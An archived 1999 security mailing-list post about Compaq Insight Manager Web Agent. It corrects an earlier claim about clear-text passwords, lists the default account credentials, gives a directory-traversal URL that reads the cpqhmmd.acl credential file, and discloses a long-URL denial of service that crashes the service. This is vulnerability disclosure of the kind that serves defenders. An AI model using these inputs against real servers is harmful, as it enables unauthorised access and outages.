Re: Infosec.19990526.compaq-im.a (New DoS and correction to my

From: Vacuum (vacuumat_private)
Date: Thu May 27 1999 - 19:43:09 PDT

Next message: Simon Liddington: "Re: ICSA - Certified Sites and Criteria Issues"

Previous message: aleph1at_private: "Microsoft Security Bulletin (MS99-018)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Upon further research, I must retract my earlier statement that the
Compaq Insight Manager Web Agent's passwords are stored in clear text.
Infact, what we see in cpqhmmd.acl are the account name and username in
clear text NOT the password.

Explanation of username and password combinations mentioned in my previous
post.

c:\compaq\wbem\cpqhmmd.acl
or
http://111.111.111.111:2301/../../../compaq/wbem/cpqhmmd.acl
cpqhmmd.acl contents:
Compaq-WBEM-AclFile, 1.1
anonymousanonymous737EEEFA7617ED94EDD74E659B83035F
login in progress...login in progress...7A21DD9917C0C23907267FC07DBC7D12
administratoradministrator37741E7AC5B9871F87CE6ABE15B28FCB070293B3998C461D866E277A259619F0
operatoroperatorB5CE548356D1BEA5F1CFEE12FE9502C3041D1015AEC9F60412C7F86E62D6672C
useruserEC286E733A8892ADFC895611D1557557C865DE636CA398F8523EDBE5700D457A

The default usernames and password combinations that I mentioned in my
previous
post are still valid.

Once again these are the defaults: account: anonymous username: anonymous
password:
account: user username: user password: public
account: operator username: operator password: operator
account: administrator username: administrator password: administrator

There are three types of data:
Default(read only), Sets(read/write), and Reboot(read/write).
The WebAgent.ini file in the system_root\CpqMgmt\WebAgent directory
specifies the level
of user that has access to data . The "read=" and "write=" entries in the
file set the
user accounts required for access, where: 0 = No access, 1 = Anonymous, 2
= User,
3 = Operator, and 4 = Administrator.
Changing these entries changes the security. The web-enabled Server Agent
service must
be stopped and restarted for any changes to take effect. Do not modify
anything except
the read/write levels.

New Denial of service:

Just to make this post somewhat worthwile.
http://111.111.111.111:2301/AAAAAAAA..... (223 A's seemed to be the
minimum)

The first time this occurs, an application error occurs in surveyor.exe
Exception: access violation (0xc0000005), Address: 0x100333e5

If you restart the Insight Web Agent Service and repeat it
will cause an application error in cpqwmget.exe
Exception: access violation(0xc0000005), Address 0x002486d4

The http://111.111.111.111 will no longer respond until the service is
stopped and restarted.

Apologies for my previous error.
vac

Next message: Simon Liddington: "Re: ICSA - Certified Sites and Criteria Issues"
Previous message: aleph1at_private: "Microsoft Security Bulletin (MS99-018)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:47:29 PDT